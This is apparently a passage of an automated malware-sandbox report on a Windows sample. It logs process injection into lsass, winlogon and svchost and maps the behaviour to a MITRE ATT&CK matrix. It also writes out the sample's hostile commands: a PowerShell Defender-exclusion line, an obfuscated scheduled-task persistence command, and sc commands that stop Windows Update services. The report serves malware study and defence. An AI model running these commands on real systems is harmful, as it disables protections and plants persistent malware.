Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2735A070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1FDE5D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 254513D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 13982AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 28075470000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 16B11FA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24A0DA40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 13954070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 198375C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E4DB990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 11AECDD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F0108C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A03E6A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B66F1C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BAA95D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DAC1150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A7923A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ADC2340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24D249A0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B2C0FB0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: AD0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EEC8960000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256EDBD0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA7ED70000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175B4780000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CD1620000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13F17A90000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181E95B0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF53B20000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1755C590000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC61270000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 268A5A50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 1F89C000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2028AB40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205B9510000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1CCF0290000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BC8AF50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DEBD3B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2735A070000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FDE5D40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254513D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13982AF0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28075470000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16B11FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24A0DA40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13954070000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 198375C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E4DB990000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 11AECDD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F0108C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A03E6A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B66F1C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BAA95D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DAC1150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7923A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADC2340000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24D249A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B2C0FB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: AD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EEC8960000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 256EDBD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA7ED70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 175B4780000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CD1620000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13F17A90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181E95B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF53B20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1755C590000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FC61270000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD1DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\file.exe | Thread register set: target process: 6996
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Thread register set: target process: 4576
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Thread register set: target process: 6436
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: A5A52908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 9C002908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8AB42908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: B9512908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\dwm.exe EIP: F0292908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8AF52908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BD3B2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5A072908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E5D42908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 513D2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 82AF2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 75472908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 11FA2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DA42908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 54072908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 375C2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DB992908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: ECDD2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe EIP: 16F82908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 108C2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 3E6A2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6F1C2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A95D2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C1152908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 923A2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C2342908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 249A2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C0FB2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AD2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C8962908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: EDBD2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7ED72908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B4782908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D1622908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 17A92908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E95B2908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53B22908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5C592908
                        Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 61272908
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#iejbryoj#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''c:\users\user\appdata\roaming\microsoft\dxpserver.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\microsoft\dxpserver.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'sethc' -runlevel 'highest' -force; }
                        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#iejbryoj#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''c:\users\user\appdata\roaming\microsoft\dxpserver.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\microsoft\dxpserver.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'sethc' -runlevel 'highest' -force; }
                        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe | Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                        Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5A614A0 cpuid
Source: C:\Windows\System32\dialer.exe | Code function: 11_2_00007FF7D2FD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
Source: C:\Windows\System32\winlogon.exe | Code function: 14_2_00000268A5BB7A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
MITRE ATT&CK matrix (a leading number is the count of matched signatures for that technique):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Command and Scripting Interpreter | 21 Windows Service | 1 Access Token Manipulation | 4 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 21 Windows Service | 11 Masquerading | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 1 Native API | Logon Script (Windows) | 712 Process Injection | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 712 Process Injection | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Obfuscated Files or Information | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
